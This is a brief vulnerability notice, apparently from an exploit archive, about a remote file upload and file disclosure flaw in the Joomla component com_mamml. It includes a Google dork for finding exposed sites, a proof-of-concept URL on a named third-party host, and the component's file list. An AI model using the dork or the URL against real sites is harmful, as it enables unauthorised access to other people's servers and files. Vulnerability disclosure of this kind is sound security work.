Joomla Component com_mamml Remote file upload&File disclosure vulnerability


By: e.wiZz!


In the wild....


Dork: allinurl:"com_mamml"

Bugs example:

www.inthewild.com/<PATH>/com_mamml/admin.mamml.html.inc

POC:

http://www.schmalls.com/update/0.4.10/administrator/components/com_mamml/admin.mamml.html.inc


Others:

 admin.mamml.html.inc    
 admin.mamml.inc      
 classes/               
 configuration.inc        
 images/                 
 install.mamml.inc        
 mamml.png            
 mamml.version.inc       
 mamml.xml                
 toolbar.mamml.html.inc   
 toolbar.mamml.inc        
 uninstall.mamml.inc